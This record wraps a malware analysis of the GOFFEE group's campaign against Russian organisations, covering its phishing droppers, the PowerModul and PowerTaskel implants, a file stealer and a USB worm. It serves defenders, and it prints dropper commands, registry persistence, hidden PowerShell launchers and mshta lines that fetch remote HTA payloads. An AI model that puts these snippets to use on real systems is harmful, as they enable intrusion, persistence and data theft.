{ "id": "437da3cf-cbda-4f6a-be8d-c634e056d811", "created_at": "2026-04-06T00:21:21.66704Z", "updated_at": "2026-04-10T03:33:30.094341Z", "deleted_at": null, "sha1_hash": "b5909a0e0f4d20ff2b6ff59e1a098b7619a114ca", "title": "GOFFEE continues to attack organizations in Russia", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1395206, "plain_text": "GOFFEE continues to attack organizations in Russia\r\nBy Oleg Kupreev\r\nPublished: 2025-04-10 · Archived: 2026-04-02 11:22:41 UTC\r\nGOFFEE is a threat actor that first came to our attention in early 2022. Since then, we have observed malicious\r\nactivities targeting exclusively entities located in the Russian Federation, leveraging spear phishing emails with a\r\nmalicious attachment. Starting in May 2022 and up until summer of 2023, GOFFEE deployed modified Owowa\r\n(malicious IIS module) in their attacks. As of 2024, GOFFEE started to deploy patched malicious instances of\r\nexplorer.exe via spear phishing.\r\nDuring the second half of 2024, GOFFEE continued to launch targeted attacks against organizations in Russia,\r\nutilizing PowerTaskel, a non-public Mythic agent written in PowerShell, and introducing a new implant that we\r\ndubbed “PowerModul”. The targeted sectors included media and telecommunications, construction, government\r\nentities, and energy companies.\r\nThis report in a nutshell:\r\nGOFFEE updated distribution schemes.\r\nA previously undescribed implant dubbed PowerModul was introduced.\r\nGOFFEE is increasingly abandoning the use of PowerTaskel in favor of a binary Mythic agent for lateral\r\nmovement.\r\nFor more information, please contact: intelreports@kaspersky.com\r\nTechnical details\r\nInitial infection\r\nCurrently, several infection schemes are being used at the same time. The starting point is typically a phishing email\r\nwith a malicious attachment, but the schemes diverge slightly from there. We will review two of them relevant at\r\nthe time of the research.\r\nThe first infection scheme uses a RAR archive with an executable file masquerading as a document. In some cases,\r\nthe file name uses a double extension, such as “.pdf.exe” or “.doc.exe”. When the user clicks the executable file, a\r\ndecoy document is downloaded from the C2 and opened, while malicious activity is carried out in parallel.\r\nhttps://securelist.com/goffee-apt-new-attacks/116139/\r\nPage 1 of 23\n\nExample of decoy document\r\nThe file itself is a Windows system file (explorer.exe or xpsrchvw.exe), with part of its code patched with a\r\nmalicious shellcode. The shellcode is similar to what we saw in earlier attacks, but in addition contains an\r\nobfuscated Mythic agent, which immediately begins communicating with the command-and-control (C2) server.\r\nhttps://securelist.com/goffee-apt-new-attacks/116139/\r\nPage 2 of 23\n\nMalware execution flow v1\r\nIn the second case, the RAR archive contains a Microsoft Office document with a macro that serves as a dropper.\r\nMalware execution flow v2\r\nhttps://securelist.com/goffee-apt-new-attacks/116139/\r\nPage 3 of 23\n\nMalicious document with a macro\r\nWhen a document is opened, scrambled text and a warning image with the message, “This document was created in\r\nan earlier version of Microsoft Office Word. For Microsoft Office Word to display the contents correctly, click\r\n‘Enable Content'”, are shown. Clicking “Enable Content” activates a macro that hides the warning image and\r\nrestores the text through a normal character replacement operation. Additionally, the macro creates two files in the\r\nuser’s current folder: an HTA and a PowerShell file, and writes the HTA into the registry using the “LOAD” registry\r\nvalue of the “HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows” registry key.\r\nHKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\r\n\"LOAD\"=\"C:\\Users\\\u003cUSER_NAME\u003e\\UserCache.ini.hta\"\r\nAlthough the macro itself does not start anything or create new processes, the programs listed in the “LOAD” value\r\nof the registry key are run automatically for the currently logged-on user.\r\nhttps://securelist.com/goffee-apt-new-attacks/116139/\r\nPage 4 of 23\n\nUserCache.ini.hta content\r\nThe malicious HTA runs a PowerShell script (PowerModul), but not directly. Instead, it first uses cmd.exe and\r\noutput redirection to drop a JavaScript file named “UserCacheHelper.lnk.js” onto the disk, and then executes it.\r\nOnly then does the dropped JavaScript run PowerModul:\r\ncmd.exe /c if not exist \"C:\\Users\\user\\UserCacheHelper.lnk.js\" echo var objService =\r\nGetObject(\"winmgmts:\\\\\\\\.\\\\root\\\\cimv2\");var objStartup = objService.Get(\"Win32_ProcessStartup\");var\r\nobjConfig = objStartup.SpawnInstance_();objConfig.ShowWindow = 0;var processClass =\r\nobjService.Get(\"Win32_Process\");var command = \"powershell.exe -c \\\"$raw= Get-Content\r\nC:\\\\Users\\\\user\\\\UserCache.ini;Invoke-Expression $raw\\\"\";var result = processClass.Create(command, null,\r\nobjConfig, 0); \u003e C:\\Users\\user\\UserCacheHelper.lnk.js\r\nIt is worth noting that “UserCache.ini.hta” and “UserCacheHelper.lnk.js” contain strings with full paths to the files,\r\nincluding the local user’s name, instead of environment variables. As a result, the control keys, as well as the file\r\nsizes, will vary depending on the current user’s name.\r\nhttps://securelist.com/goffee-apt-new-attacks/116139/\r\nPage 5 of 23\n\nUserCacheHelper.lnk.js content\r\nThe “UserCacheHelper.lnk.js” file launches a PowerShell file named “UserCache.ini”, dropped by the initial macro.\r\nThis file contains encoded PowerModul.\r\nPowerModul\r\nMD5 60A53D2C653991F086C4E6663D652CF2\r\nSHA1 636814C31B78DD291049029A655238D7ADAFF041\r\nSHA256 BE1D0FAF1C253FAACBA1059971B01D1D646256D7B2E557DA55ED059542AFDBCD\r\nFile type PowerShell\r\nFile size 6.66 KB\r\nFile name UserCache.ini\r\nPowerModul is a PowerShell script capable of receiving and executing additional PowerShell scripts from the C2\r\nserver. The first instances of this implant’s usage were detected at the beginning of 2024. Initially, it was used to\r\ndownload and launch the PowerTaskel implant, and was considered a relatively minor component for launching\r\nPowerTaskel. However, its use of a unique protocol, distinct payload types, and a C2 server different from\r\nPowerTaskel’s led us to classify it as a separate family.\r\nhttps://securelist.com/goffee-apt-new-attacks/116139/\r\nPage 6 of 23\n\nUserCache.ini content\r\nIn the scheme being described, the PowerModul code is embedded in the “UserCache.ini” file as a Base64-encoded\r\nstring. The beginning and end of the decoded script are shown in the images below, while the middle section\r\ncontains a copy of the HTA file, as well as code responsible for dropping the HTA file onto the disk, writing it to the\r\nregistry, and hiding the file by changing its attributes to “Hidden”. Essentially, this code replicates part of the\r\nfunctionality of the VBA macro found in the Word document, except for file hiding, which was not implemented in\r\nVBA.\r\nBeginning of PowerModul\r\nhttps://securelist.com/goffee-apt-new-attacks/116139/\r\nPage 7 of 23\n\nEnd of PowerModul\r\nWhen accessing the C2, PowerModul appends an infected system identifier string to the C2 URL, consisting of the\r\ncomputer name, username, and disk serial number, separated with underscores:\r\nhxxp://62.113.114[.]117/api/texts/{computer_name}_{username}_{serial_number}\r\nThe response from the C2 is in XML format, complete with scripts encoded in Base64:\r\nhttps://securelist.com/goffee-apt-new-attacks/116139/\r\nPage 8 of 23\n\nHTTP/1.1 200 OK\r\nServer: nginx/1.18.0\r\nContent-Type: text/plain\r\nContent-Length: 35373\r\nConnection: keep-alive\r\n\u003cConfigs\u003e\r\n  \u003cConfig\u003e\r\n\u003cModule\u003eZnVuY3Rpb24gQ3JlYXRlVkJTRmlsZSgkYkJkcmxzRCwgJGlMc1FybVQsIC....==\u003c/Module\u003e\r\n\u003cCountRuns\u003e250\u003c/CountRuns\u003e\r\n\u003cInterval\u003e1\u003c/Interval\u003e\r\n  \u003c/Config\u003e\r\n  \u003cConfig\u003e\r\n\u003cModule\u003eZnVuY3Rpb24gUnVuKCl7DQokaWQgPSBnZXQtcmFuZG9tDQokY29kZSA9I...\u003c/Module\u003e\r\nThere is an additional, previously undescribed function in PowerModul, named “OfflineWorker()”. It decodes a\r\npredefined string and executes its contents. In the instance shown in the screenshots above, the string to be decoded\r\nis empty, and therefore, nothing is executed. However, we have observed cases where the string contained content.\r\nAn example of the OfflineWorker() function containing the FlashFileGrabber data stealing tool code is shown\r\nbelow:\r\nfunction OfflineWorker() {\r\ntry{\r\n     $___offlineFlash =\r\n'ZnVuY3Rpb24gUnVuKCl7DQokaWQgPSBnZXQtcmFuZG9tDQokY29kZSA9IE…….=';\r\n     if($___offlineFlash -ne ''){\r\n         $___flashOfflineDecoded = FromBase64 $___offlineFlash;\r\n         Invoke-Expression($___flashOfflineDecoded);\r\n     }\r\n}\r\nhttps://securelist.com/goffee-apt-new-attacks/116139/\r\nPage 9 of 23\n\ncatch{}\r\n}\r\nThe payloads used by PowerModul include the PowerTaskel, FlashFileGrabber, and USB Worm tools.\r\nFlashFileGrabber\r\nAs its name suggests, FlashFileGrabber is designed to steal files from removable media, such as flash drives. We\r\nhave identified two variants: FlashFileGrabber and FlashFileGrabberOffline.\r\nFlashFileGrabberOffline main routine\r\nFlashFileGrabberOffline searches removable media for files with specific extensions, and when found, copies them\r\nto the local disk. To accomplish this, it creates a series of subdirectories in the TEMP folder, following the template\r\n“%TEMP%\\CacheStore\\connect\\\u003cVolumeSerialNumber\u003e\\”. The folder names “CacheStore” and “connect” are\r\nhardcoded within the script. Examples of such paths are provided below:\r\n%TEMP%\\CacheStore\\connect\\62431103\\2024\\some.pdf\r\n%TEMP%\\CacheStore\\connect\\62431103\\Documents\\some.docx\r\nhttps://securelist.com/goffee-apt-new-attacks/116139/\r\nPage 10 of 23\n\n%TEMP%\\CacheStore\\connect\\62431103\\attachment.jpg\r\n%TEMP%\\CacheStore\\connect\\6c1d1372\\Print\\resume.docx\r\nAdditionally, a file named “ftree.db” is created at the path specified in the template, which stores metadata for the\r\ncopied files, including the full path to the original file, its size, and dates of last access and modification.\r\nFurthermore, in the “%AppData%” folder, the “internal_profiles.db” file is created, storing the MD5 sums of the\r\naforementioned metadata. This allows the malware to avoid copying the same files more than once:\r\n%TEMP%\\CacheStore\\connect\\\u003cVolumeSerialNumber\u003e\\ftree.db\r\n%AppData%\\internal_profiles.db\r\nThe list of file extensions of interest is as follows:\r\n.7z .kml .rar\r\n.conf .log .rtf\r\n.csv .lrf .scr\r\n.doc .mdb .thm\r\n.docx .ods .txt\r\n.dwg .odt .xlm\r\n.heic .ovpn .xls\r\n.hgt .pdf .xlsm\r\n.html .png .xlsx\r\n.jpeg .pptx .xml\r\n.jpg .ps1 .zip\r\nFlashFileGrabber largely duplicates the functionality of FlashFileGrabberOffline, but with one key difference: it is\r\ncapable of sending files to the C2 server.\r\nhttps://securelist.com/goffee-apt-new-attacks/116139/\r\nPage 11 of 23\n\nFlashFileGrabber’s routines\r\nUSB Worm\r\nUSB Worm is capable of infecting removable media with a copy of PowerModul. To achieve this, the worm\r\nrenames the files on the removable disk with a random name, retaining their original extension, and assigns them\r\nthe “Hidden” file attribute. The “UserCache.ini” file, which contains PowerModul, is then copied to the folder with\r\nthe original file.\r\nhttps://securelist.com/goffee-apt-new-attacks/116139/\r\nPage 12 of 23\n\nUSB Worm main routine\r\nAdditionally, the worm creates hidden VBS and batch files to launch PowerModul and open a decoy document.\r\nCreateVBSFile() and CreateBatFile() functions\r\nSet WshShell = WScript.CreateObject(\"WScript.Shell\")\r\nWshShell.Run Chr(34) \u0026 \".\\zermndzg.bat\" \u0026 Chr(34), 0, False\r\nWshShell.Run Chr(34) \u0026 \".\\zermndzg.docx\" \u0026 Chr(34), 1, False\r\nSet WshShell = Nothing\r\nhttps://securelist.com/goffee-apt-new-attacks/116139/\r\nPage 13 of 23\n\nExample of the contents of a malicious VBS\r\npowershell -exec bypass -windowstyle hidden -nop -c \"$raw= [io.file]::ReadAllText(\"\"\".\\UserCache.ini\"\"\");\r\niex $raw;\"\r\nExample of the contents of a malicious batch file\r\nA shortcut is also created with the original name of the decoy document, which, when launched, executes the VBS\r\nfile.\r\nCreateShortcutForFile() function\r\nTo disguise the shortcut, the worm assigns an icon from the shell32.dll library, depending on the extension of the\r\noriginal file. The worm limits the number of documents replaced with shortcuts to five, selecting only the most\r\nrecently accessed files by sorting them according to their LastAccessTime attribute.\r\nhttps://securelist.com/goffee-apt-new-attacks/116139/\r\nPage 14 of 23\n\nSystem infection scheme via removable media\r\nPowerTaskel\r\nWe have dubbed the non-public PowerShell Mythic agent delivered via a mail-based infection chain since early\r\n2023, as PowerTaskel. This implant possesses only two primary capabilities: sending information about the targeted\r\nenvironment to a C2 server in the form of a “checkin” message, and executing arbitrary PowerShell scripts and\r\ncommands received from the C2 server as “tasks” in response to “get_tasking” requests from the implant. The\r\nrequest payloads are PowerShell objects that are serialized to XML, encoded using XOR with a sample-specific 1-\r\nbyte key, and then converted to Base64.\r\nBased on the naming and ordering of the configuration parameters, it is likely that PowerTaskel is derived from the\r\nopen-source Medusa Mythic agent, which was originally written in Python.\r\nComparison of Medusa and PowerTaskel configuration code\r\nhttps://securelist.com/goffee-apt-new-attacks/116139/\r\nPage 15 of 23\n\nComparison of Medusa and PowerTaskel “checkin” function code\r\nPowerTaskel is a fully functional agent capable of executing commands and PowerShell scripts, which expand its\r\ncapabilities to downloading and uploading files, running processes, etc. However, its functionality is often\r\ninsufficient due to specific aspects of PowerShell usage, prompting the group to switch to a custom binary Mythic\r\nagent. To achieve this, PowerTaskel loads the Mythic agent from the C2 server, injects it into its own process\r\nmemory, and runs it in a separate thread. In this scenario, the Mythic agent is present as a self-configuring x32/x64\r\nshellcode. The method of injecting and loading the Mythic agent shellcode is described in more detail in the\r\n“Lateral Movement” section.\r\nIn at least one instance, PowerTaskel received a script containing a FolderFileGrabber component as a task.\r\nFolderFileGrabber largely replicates the functionality of FlashFileGrabber, with one key difference: it can grab files\r\nfrom remote systems via a hardcoded network path using the SMB protocol. The PowerShell cmdlet “New-SmbMapping” is used to access remote system resources, enabling successful retrieval of the desired files.\r\nLateral movement\r\nFollowing system infection, if the user account permissions allow it, PowerTaskel performs several tasks to elevate\r\nits privileges to the System level. To achieve this, PowerTaskel utilizes the PsExec utility, which is part of the\r\nSysinternals suite. The PsExec utility is dropped into the current directory where PowerTaskel is located and is used\r\nto execute mshta.exe with system privileges, passing a URL as an argument.\r\nThe images below depict two tasks that PowerTaskel executes with its C2 server. The first task checks for the\r\npresence of the file “ntuser.exe” in the %ProgramData% directory, and if it is not found, downloads it from the C2\r\nserver. The second task runs mshta.exe via ntuser.exe, which is actually a renamed PsExec utility.\r\nhttps://securelist.com/goffee-apt-new-attacks/116139/\r\nPage 16 of 23\n\nGetting “ntuser.exe”\r\nThe “ntuser.exe” executable running “mshta.exe”\r\nhttps://securelist.com/goffee-apt-new-attacks/116139/\r\nPage 17 of 23\n\nThe next image illustrates an example of the execution flow of various scripts and commands started with the\r\nprivilege elevation procedure. The executable file “1cv9.exe” is a renamed PsExec utility, and the argument “-s”\r\nspecifies that the process it launches should run under the System account. The launched program “mshta.exe”\r\naccepts a URL as an argument, which points to an HTA file containing malicious, obfuscated JScript. The HTA file\r\nis cached and saved to the InetCache folder. This JScript creates two files, “desktop.js” and “user.txt”, on the disk\r\nusing the “echo” console command with output redirection to a file, and then executes desktop.js via cscript.exe.\r\nThe desktop.js file, in turn, launches the interpreter with a script on the command line, which reads the contents of\r\nuser.txt and executes it. As evident from the contents passed to the “echo” command, user.txt is another PowerShell\r\nscript whose task is to extract a payload from a hardcoded address and execute it. In this case, the payload is\r\nPowerTaskel, which now runs with the elevated privileges.\r\nExample of execution flow on an infected system\r\nOnce launched, PowerTaskel interacts with its C2 server and executes standard commands to gather information\r\nabout the system and environment. Notably, the launch of csc.exe (Visual C# Command Line Compiler) indicates\r\nthat PowerTaskel has received a task to load a shellcode, which it accomplishes using an auxiliary DLL. The\r\nprimary function of this DLL is to copy the shellcode into allocated memory. In our case, the shellcode is self-configuring code for the binary Mythic agent.\r\nThe final line of the execution flow (“hxxp://192.168.1[.]2:5985/wsman”) reveals a call to the WinRM (Microsoft\r\nWindows Remote Management) service, located on a remote host on the local network, via the loaded Mythic\r\nagent. A specific User-Agent header value, “Ruby WinRM Client”, is used to access the WinRM service.\r\nhttps://securelist.com/goffee-apt-new-attacks/116139/\r\nPage 18 of 23\n\nHTTP header for WinRM request\r\nThe WinRM service is actively utilized by GOFFEE for network distribution purposes. Typically, this involves\r\nlaunching the mshta.exe utility on the remote host with a URL as an argument. The following examples illustrate\r\nthe execution chains observed on remote hosts:\r\nwmiprvse.exe -secured -Embedding\r\n-\u003e cmd.exe /C mshta.exe https://\u003cdomain\u003e.com/\u003cword\u003e/\u003cword\u003e/\u003cword\u003e/\u003cword\u003e/\u003cword\u003e.hta\r\nwsmprovhost.exe\r\n-\u003e mshta.exe https://\u003cdomain\u003e.com/\u003cword\u003e/\u003cword\u003e/\u003cword\u003e/\u003cword\u003e/\u003cword\u003e.hta\r\nwmiprvse.exe -secured -Embedding\r\n-\u003e cmd.exe /Q /c powershell.exe mshta.exe\r\nhttps://\u003cdomain\u003e.com/\u003cword\u003e/\u003cword\u003e/\u003cword\u003e/\u003cword\u003e/\u003cword\u003e.hta\r\nwmiprvse.exe -secured -Embedding\r\n-\u003e powershell.exe /C mshta.exe https://\u003cdomain\u003e.com/\u003cword\u003e/\u003cword\u003e/\u003cword\u003e/\u003cword\u003e/\u003cword\u003e.hta\r\nRecently, we have observed that GOFFEE is increasingly abandoning the use of PowerTaskel in favor of the binary\r\nMythic agent during lateral movement.\r\nMythic agent HTA\r\nMD5 615BD8D70D234F16FC791DCE2FC5BCF0\r\nSHA1 EF14D5B97E093AABE82C4A1720789A7CF1045F6D\r\nSHA256 AFC7302D0BD55CFC603FDAF58F5483B0CC00D354274F379C75CFA17F6BA6F97D\r\nFile type Polyglot (HTML Application)\r\nFile size 165.32 KB\r\nFile name duplicate.hta\r\nThe mshta.exe utility is still employed to launch the binary Mythic agent, with a URL passed as an argument.\r\nHowever, the payload contents for the passed URL differ from the traditional HTA format. It is relatively large,\r\napproximately 180 kilobytes, and is characterized as a polyglot file, which is a type of file that can be validly\r\nhttps://securelist.com/goffee-apt-new-attacks/116139/\r\nPage 19 of 23\n\ninterpreted in multiple formats. The shellcode containing the Mythic agent is located at the beginning of the file and\r\noccupies approximately 80% of its size. It is followed by two Base64-encoded PowerShell scripts, separated by a\r\nregular line break, and finally, the HTA file itself.\r\nhttps://securelist.com/goffee-apt-new-attacks/116139/\r\nPage 20 of 23\n\nPolyglot payload\r\nWhen the mshta.exe utility downloads the aforementioned payload, it interprets it as an HTA file and transfers\r\ncontrol to an obfuscated JScript embedded within the HTA section of the polyglot file. The script first determines\r\nthe argument used to launch the mshta.exe utility, whether it was a URL or a path to a local file. If a URL was used\r\nas the argument, the script searches for the original HTA file in the InetCache folder, where the system cached the\r\nHTA file during download. To do this, the script iterates through all files in the cache folder and checks their\r\ncontents for the presence of a specific magic string.\r\nDeobfuscated JScript from the HTA section of the payload\r\nIf an HTA file is found on the disk, the script drops two files, “settings.js” and “settings.ps1”, using the “echo”\r\ncommand, and then runs settings.js with additional command-line arguments. The script then sets a timer for 10\r\nseconds, after which the dropped files will be deleted.\r\nhttps://securelist.com/goffee-apt-new-attacks/116139/\r\nPage 21 of 23\n\nDeobfuscated “settings.js”\r\nThe running settings.js script accepts three command-line arguments: the path to powershell.exe, the path to the\r\nHTA file, and the string “Shell.Application”. These received arguments are used to populate a PowerShell script, the\r\ncontents of which are then passed to the powershell.exe command line.\r\npowershell.exe -c \"$INbqDKHp = \\\"C:\\\\\\\\Users\\\\\\\\\r\n[username]\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\INetCache\\\\\\\\IE\\\\\\\\duplicate````[1````].hta\\\";$OdfUfjp\r\n= get-content $env:USERPROFILE\\\\settings.ps1;$KWfWXqek=1;Invoke-Expression\r\n$OdfUfjp;$KWfWXqek=2;Invoke-Expression $OdfUfjp;$KWfWXqek=3;Invoke-Expression $OdfUfjp;\"\r\nThe script passed to the PowerShell interpreter declares two variables: “$INbqDKHp”, which stores the path to the\r\nHTA file, and “$KWfWXqek”, a counter. The script then reads the contents of “settings.ps1” and executes it three\r\ntimes, passing the path to the HTA file and the counter as arguments, and incrementing the value of the\r\n“$KWfWXqek” variable by 1 each time.\r\nDeobfuscated “settings.ps1”\r\nDuring each execution, the “settings.ps1” script reads the contents of the HTA file, splits it into lines, and identifies\r\nBase64-encoded scripts. To detect these scripts, it first locates the line containing the HTA application tag by\r\nsearching for the substring “\u003cHTA:APPLICATION”. The three lines preceding this tag contain Base64-encoded\r\nscripts. Depending on the value of the “$KWfWXqek” counter, the script executes the corresponding Base64-\r\nencoded script.\r\nThe first two scripts are used to declare auxiliary functions, including compiling a helper DLL, which is necessary\r\nfor executing the shellcode. The third script is responsible for allocating memory, loading the shellcode from the\r\nHTA file (whose path is retrieved from the previously defined “$INbqDKHp” variable), and transferring control to\r\nthe loaded shellcode, which is the self-configuring code of the Mythic agent.\r\nVictims\r\nAccording to our telemetry, the identified targets of the malicious activities described in this article are located in\r\nRussia, with observed activity spanning from July 2024 to December 2024. The targeted industries are diverse,\r\nencompassing organizations in the mass media and telecommunications sectors, construction, government entities,\r\nand energy companies.\r\nAttribution\r\nhttps://securelist.com/goffee-apt-new-attacks/116139/\r\nPage 22 of 23\n\nIn this campaign, the attacker utilized PowerTaskel, which had previously been linked to the GOFFEE group.\r\nAdditionally, HTA files and various scripts were employed in the infection chain.\r\nThe malicious executable attached to the spear phishing email is a patched version of explorer.exe, similar to what\r\nwe observed in GOFFEE’s attacks earlier in 2024, and contains shellcode that is very similar to the one previously\r\nused by GOFFEE.\r\nConsidering the same victimology, we can attribute this campaign to GOFFEE with a high degree of confidence.\r\nConclusions\r\nDespite using similar tools and techniques, GOFFEE introduced several notable changes in this campaign.\r\nFor the first time, they employed Word documents with malicious VBA scripts for initial infection. Additionally,\r\nGOFFEE utilized a new PowerShell script downloader, PowerModul, to download PowerTaskel, FlashFileGrabber,\r\nand USB Worm. They also began using the binary Mythic agent, and likely developed their own implementations in\r\nPowerShell and C.\r\nWhile GOFFEE continues to refine their existing tools and introduce new ones, these changes are not significant\r\nenough to suggest that they can be confused with another actor.\r\nSource: https://securelist.com/goffee-apt-new-attacks/116139/\r\nhttps://securelist.com/goffee-apt-new-attacks/116139/\r\nPage 23 of 23", "extraction_quality": 1, "language": "EN", "sources": [ "MISPGALAXY", "Malpedia" ], "references": [ "https://securelist.com/goffee-apt-new-attacks/116139/" ], "report_names": [ "116139" ], "threat_actors": [ { "id": "120b98af-cc15-468d-ae91-52d5af9216e4", "created_at": "2025-05-29T02:00:03.189197Z", "updated_at": "2026-04-10T02:00:03.84415Z", "deleted_at": null, "main_name": "GOFFEE", "aliases": [], "source_name": "MISPGALAXY:GOFFEE", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434881, "ts_updated_at": 1775792010, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/b5909a0e0f4d20ff2b6ff59e1a098b7619a114ca.pdf", "text": "https://archive.orkl.eu/b5909a0e0f4d20ff2b6ff59e1a098b7619a114ca.txt", "img": "https://archive.orkl.eu/b5909a0e0f4d20ff2b6ff59e1a098b7619a114ca.jpg" } }